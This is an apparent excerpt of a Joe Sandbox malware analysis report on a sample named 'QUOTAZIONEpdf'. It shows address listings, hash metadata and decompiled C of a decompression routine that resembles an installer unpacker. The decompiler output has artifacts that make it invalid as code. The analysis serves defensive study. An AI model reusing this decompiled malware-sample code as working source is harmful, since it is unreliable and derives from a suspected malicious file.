									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                0x00000000
                0x00406398
                0x00406398
                0x0040639c
                0x00406453
                0x00406456
                0x00406462
                0x00406343
                0x00406343
                0x00406346
                0x004066b8
                0x004066b8
                0x004066bb
                0x004066bb
                0x004066c1
                0x004066c7
                0x004066cd
                0x004066e7
                0x004066ea
                0x004066f0
                0x004066fb
                0x004066fd
                0x004066cf
                0x004066cf
                0x004066de
                0x004066e2
                0x004066e2
                0x00406707
                0x0040672e
                0x0040672e
                0x00406734
                0x00406734
                0x00000000
                0x00406709
                0x00406709
                0x0040670d
                0x004068bc
                0x00000000
                0x004068bc
                0x00406719
                0x00406720
                0x00406728
                0x0040672b
                0x00000000
                0x0040672b
                0x004063a2
                0x004063a6
                0x004068e7
                0x004068e7
                0x004068ea
                0x004068ee
                0x004068ee
                0x004063ac
                0x004063b2
                0x004063b5
                0x004063b9
                0x004063bc
                0x004063c0
                0x00406886
                0x004068d2
                0x004068da
                0x004068e1
                0x004068e3
                0x00000000
                0x004068e3
                0x004063c6
                0x004063c9
                0x004063cf
                0x004063d1
                0x004063d1
                0x004063d4
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e3
                0x004063e4
                0x004063e6
                0x004063e6
                0x004063e6
                0x004063e9
                0x004063ec
                0x004063ef
                0x004063f2
                0x004063f2
                0x004063f5
                0x004063f7
                0x004063f7
                0x004063fa
                0x004063fa
                0x004063fa
                0x00405ed0
                0x00405ed0
                0x00405ed9
                0x00000000
                0x00000000
                0x00405edf
                0x00000000
                0x00405eea
                0x00000000
                0x00000000
                0x00405ef3
                0x00405ef6
                0x00405ef9
                0x00405efd
                0x00000000
                0x00000000
                0x00405f03
                0x00405f06
                0x00405f08
                0x00405f09
                0x00405f0c
                0x00405f0e
                0x00405f0f
                0x00405f11
                0x00405f14
                0x00405f19
                0x00405f1e
                0x00405f27
                0x00405f3a
                0x00405f3d
                0x00405f49
                0x00405f71
                0x00405f73
                0x00405f81
                0x00405f81
                0x00405f85
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405f75
                0x00405f75
                0x00405f78
                0x00405f79
                0x00405f79
                0x00000000
                0x00405f75
                0x00405f4f
                0x00405f54
                0x00405f54
                0x00405f5d
                0x00405f65
                0x00405f68
                0x00000000
                0x00405f6e
                0x00405f6e
                0x00000000
                0x00405f6e
                0x00000000
                0x00405f8b
                0x00405f8b
                0x00405f8f
                0x0040683b
                0x00000000
                0x0040683b
                0x00405f98
                0x00405fa8
                0x00405fab
                0x00405fae
                0x00405fae
                0x00405fae
                0x00405fb1
                0x00405fb5
                0x00000000
                0x00000000
                0x00405fb7
                0x00405fbd
                0x00405fe7
                0x00405fed
                0x00405ff4
                0x00000000
                0x00405ff4
                0x00405fc3
                0x00405fc6
                0x00405fcb
                0x00405fcb
                0x00405fd6
                0x00405fde
                0x00405fe1
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406026
                0x0040602c
                0x0040602f
                0x0040603c
                0x00406044
                0x00000000
                0x00000000
                0x00405ffb
                0x00405ffb
                0x00405fff
                0x0040684a
                0x00000000
                0x0040684a
                0x0040600b
                0x00406016
                0x00406016
                0x00406016
                0x00406019
                0x0040601c
                0x0040601f
                0x00406024
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040604c
                0x0040604e
                0x00406051
                0x004060c2
                0x004060c5
                0x004060c8
                0x004060cf
                0x004060d9
                0x00000000
                0x004060d9
                0x00406053
                0x00406057
                0x0040605a
                0x0040605c
                0x0040605f
                0x00406062
                0x00406064
                0x00406067
                0x00406069
                0x0040606e
                0x00406071
                0x00406074
                0x00406078
                0x0040607f
                0x00406082
                0x00406089
                0x0040608d
                0x00406095
                0x00406095
                0x00406095
                0x0040608f
                0x0040608f
                0x0040608f
                0x00406084
                0x00406084
                0x00406084
                0x00406099
                0x0040609c
                0x004060ba
                0x004060bc
                0x00000000
                0x0040609e
                0x0040609e
                0x004060a1
                0x004060a4
                0x004060a7
                0x004060a9
                0x004060a9
                0x004060a9
                0x004060ac
                0x004060af
                0x004060b1
                0x004060b2
                0x004060b5
                0x00000000
                0x004060b5
                0x00000000
                0x004062eb
                0x004062ef
                0x0040630d
                0x00406310
                0x00406317
                0x0040631a
                0x0040631d
                0x00406320
                0x00406323
                0x00406326
                0x00406328
                0x0040632f
                0x00406330
                0x00406332
                0x00406335
                0x00406338
                0x0040633b
                0x0040633b
                0x00406340
                0x00000000
                0x00406340
                0x004062f1
                0x004062f4
                0x004062f7
                0x00406301
                0x00000000
                0x00000000
                0x00406355
                0x00406359
                0x0040637c
                0x0040637f
                0x00406382
                0x0040638c
                0x0040635b
                0x0040635b
                0x0040635e
                0x00406361
                0x00406364
                0x00406371
                0x00406374
                0x00406374
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406409
                0x0040640d
                0x00406414
                0x00406417
                0x0040641a
                0x00406424
                0x00000000
                0x00406424
                0x0040640f
                0x00000000
                0x00000000
                0x00406430
                0x00406434
                0x0040643b
                0x0040643e
                0x00406441
                0x00406436
                0x00406436
                0x00406436
                0x00406444
                0x00406447
                0x0040644a
                0x0040644a
                0x0040644d
                0x00406450
                0x00000000
                0x00000000
                0x004064f0
                0x004064f0
                0x004064f4
                0x00406892
                0x00000000
                0x00406892
                0x004064fa
                0x004064fd
                0x00406500
                0x00406504
                0x00406507
                0x0040650d
                0x0040650f
                0x0040650f
                0x0040650f
                0x00406512
                0x00406515
                0x00000000
                0x00000000
                0x004060e5
                0x004060e5
                0x004060e9
                0x00406856
                0x00000000
                0x00406856
                0x004060ef
                0x004060f2
                0x004060f5
                0x004060f9
                0x004060fc
                0x00406102
                0x00406104
                0x00406104
                0x00406104
                0x00406107
                0x0040610a
                0x0040610a
                0x0040610d
                0x00406110
                0x00000000
                0x00000000
                0x00406116
                0x0040611c
                0x00000000
                0x00000000
                0x00406122
                0x00406122
                0x00406126
                0x00406129
                0x0040612c
                0x0040612f
                0x00406132
                0x00406133
                0x00406136
                0x00406138
                0x0040613e
                0x00406141
                0x00406144
                0x00406147
                0x0040614a
                0x0040614d
                0x00406150
                0x0040616c
                0x0040616f
                0x00406172
                0x00406175
                0x0040617c
                0x00406180
                0x00406182
                0x00406186
                0x00406152
                0x00406152
                0x00406156
                0x0040615e
                0x00406163
                0x00406165
                0x00406167
                0x00406167
                0x00406189
                0x00406190
                0x00406193
                0x00000000
                0x00406199
                0x00000000
                0x00406199
                0x00000000
                0x0040619e
                0x0040619e
                0x004061a2
                0x00406862
                0x00000000
                0x00406862
                0x004061a8
                0x004061ab
                0x004061ae
                0x004061b2
                0x004061b5
                0x004061bb
                0x004061bd
                0x004061bd
                0x004061bd
                0x004061c0
                0x004061c3
                0x004061c3
                0x004061c3
                0x004061c9
                0x00000000
                0x00000000
                0x004061cb
                0x004061ce
                0x004061d1
                0x004061d4
                0x004061d7
                0x004061da
                0x004061dd
                0x004061e0
                0x004061e3
                0x004061e6
                0x004061e9
                0x00406201
                0x00406204
                0x00406207
                0x0040620a
                0x0040620a
                0x0040620d
                0x00406211
                0x00406213
                0x004061eb
                0x004061eb
                0x004061f3
                0x004061f8
                0x004061fa
                0x004061fc
                0x004061fc
                0x00406216
                0x0040621d
                0x00406220
                0x00000000
                0x00406222
                0x00000000
                0x00406222
                0x00406220
                0x00406227
                0x00406227
                0x00406227
                0x00406227
                0x00000000
                0x00000000
                0x00406262
                0x00406262
                0x00406266
                0x0040686e
                0x00000000
                0x0040686e
                0x0040626c
                0x0040626f
                0x00406272
                0x00406276
                0x00406279
                0x0040627f
                0x00406281
                0x00406281
                0x00406281
                0x00406284
                0x00406287
                0x00406287
                0x0040628d
                0x0040622b
                0x0040622b
                0x0040622e
                0x00000000
                0x0040622e
                0x0040628f
                0x0040628f
                0x00406292
                0x00406295
                0x00406298
                0x0040629b
                0x0040629e
                0x004062a1
                0x004062a4
                0x004062a7
                0x004062aa
                0x004062ad
                0x004062c5
                0x004062c8
                0x004062cb
                0x004062ce
                0x004062ce
                0x004062d1
                0x004062d5
                0x004062d7
                0x004062af
                0x004062af
                0x004062b7
                0x004062bc
                0x004062be
                0x004062c0
                0x004062c0
                0x004062da
                0x004062e1
                0x004062e4
                0x00000000
                0x004062e6
                0x00000000
                0x004062e6
                0x00000000
                0x00406573
                0x00406573
                0x00406577
                0x0040689e
                0x00000000
                0x0040689e
                0x0040657d
                0x00406580
                0x00406583
                0x00406587
                0x0040658a
                0x00406590
                0x00406592
                0x00406592
                0x00406592
                0x00406595
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406682
                0x00406686
                0x004066a8
                0x004066ab
                0x004066b5
                0x00000000
                0x004066b5
                0x00406688
                0x0040668b
                0x0040668f
                0x00406692
                0x00406692
                0x00406695
                0x00000000
                0x00000000
                0x0040673f
                0x00406743
                0x00406761
                0x00406761
                0x00406761
                0x00406768
                0x0040676f
                0x00406776
                0x00406776
                0x00000000
                0x00406776
                0x00406745
                0x00406748
                0x0040674b
                0x0040674e
                0x00406755
                0x00406699
                0x00406699
                0x0040669c
                0x00000000
                0x00000000
                0x00406830
                0x00406833
                0x00000000
                0x00000000
                0x0040646a
                0x0040646c
                0x00406473
                0x00406474
                0x00406476
                0x00406479
                0x00000000
                0x00000000
                0x00406481
                0x00406484
                0x00406487
                0x00406489
                0x0040648b
                0x0040648b
                0x0040648c
                0x0040648f
                0x00406496
                0x00406499
                0x004064a7
                0x00000000
                0x00000000
                0x0040677d
                0x0040677d
                0x00406780
                0x00406787
                0x00000000
                0x00000000
                0x0040678c
                0x0040678c
                0x00406790
                0x004068c8
                0x00000000
                0x004068c8
                0x00406796
                0x00406799
                0x0040679c
                0x004067a0
                0x004067a3
                0x004067a9
                0x004067ab
                0x004067ab
                0x004067ab
                0x004067ae
                0x004067b1
                0x004067b1
                0x004067b1
                0x004067b1
                0x004067b4
                0x004067b4
                0x004067b8
                0x00406818
                0x0040681b
                0x00406820
                0x00406821
                0x00406823
                0x00406825
                0x00406828
                0x00000000
                0x00406828
                0x004067ba
                0x004067c0
                0x004067c3
                0x004067c6
                0x004067c9
                0x004067cc
                0x004067cf
                0x004067d2
                0x004067d5
                0x004067d8
                0x004067db
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fd
                0x00406801
                0x00406803
                0x00406803
                0x00406804
                0x00406807
                0x004067dd
                0x004067dd
                0x004067e5
                0x004067ea
                0x004067ec
                0x004067ef
                0x004067ef
                0x0040680a
                0x00406811
                0x00000000
                0x00406813
                0x00000000
                0x00406813
                0x00000000
                0x004064af
                0x004064b2
                0x004064e8
                0x00406618
                0x00406618
                0x00406618
                0x00406618
                0x0040661b
                0x0040661b
                0x0040661e
                0x00406620
                0x004068aa
                0x00000000
                0x004068aa
                0x00406626
                0x00406629
                0x00000000
                0x00000000
                0x0040662f
                0x00406633
                0x00406636
                0x00406636
                0x00406636
                0x00000000
                0x00406636
                0x004064b4
                0x004064b6
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064be
                0x004064c0
                0x004064c2
                0x004064c5
                0x004064c8
                0x004064de
                0x004064e3
                0x0040651b
                0x0040651b
                0x0040651f
                0x0040654b
                0x0040654d
                0x00406554
                0x00406557
                0x0040655a
                0x0040655a
                0x0040655f
                0x0040655f
                0x00406561
                0x00406564
                0x0040656b
                0x0040656e
                0x0040659b
                0x0040659b
                0x0040659e
                0x004065a1
                0x00406615
                0x00406615
                0x00406615
                0x00000000
                0x00406615
                0x004065a3
                0x004065a9
                0x004065ac
                0x004065af
                0x004065b2
                0x004065b5
                0x004065b8
                0x004065bb
                0x004065be
                0x004065c1
                0x004065c4
                0x004065dd
                0x004065df
                0x004065e2
                0x004065e3
                0x004065e6
                0x004065e8
                0x004065eb
                0x004065ed
                0x004065ef
                0x004065f2
                0x004065f4
                0x004065f7
                0x004065fb
                0x004065fd
                0x004065fd
                0x004065fe
                0x00406601
                0x00406604
                0x004065c6
                0x004065c6
                0x004065ce
                0x004065d3
                0x004065d5
                0x004065d8
                0x004065d8
                0x00406607
                0x0040660e
                0x00406598
                0x00406598
                0x00406598
                0x00406598
                0x00000000
                0x00406610
                0x00000000
                0x00406610
                0x0040660e
                0x00406521
                0x00406524
                0x00406526
                0x00406529
                0x0040652c
                0x0040652f
                0x00406531
                0x00406534
                0x00406537
                0x00406537
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406544
                0x00406518
                0x00406518
                0x00406518
                0x00406518
                0x00000000
                0x00406546
                0x00000000
                0x00406546
                0x00406544
                0x004064ca
                0x004064cd
                0x004064cf
                0x004064d2
                0x00000000
                0x00000000
                0x00406231
                0x00406231
                0x00406235
                0x0040687a
                0x00000000
                0x0040687a
                0x0040623b
                0x0040623e
                0x00406241
                0x00406244
                0x00406247
                0x0040624a
                0x0040624d
                0x0040624f
                0x00406252
                0x00406255
                0x00406258
                0x0040625a
                0x0040625a
                0x0040625a
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406639
                0x00406639
                0x00406639
                0x0040663d
                0x00000000
                0x00000000
                0x00406643
                0x00406646
                0x00406649
                0x0040664c
                0x0040664e
                0x0040664e
                0x0040664e
                0x00406651
                0x00406654
                0x00406657
                0x0040665a
                0x0040665d
                0x00406660
                0x00406661
                0x00406663
                0x00406663
                0x00406663
                0x00406666
                0x00406669
                0x0040666c
                0x0040666f
                0x00406672
                0x00406676
                0x00406678
                0x0040667b
                0x00000000
                0x0040667d
                0x00000000
                0x0040667d
                0x0040667b
                0x004068b0
                0x00000000
                0x00000000
                0x00405edf

                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                • Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
                • Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                • Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405E9D, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E00405E9D(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
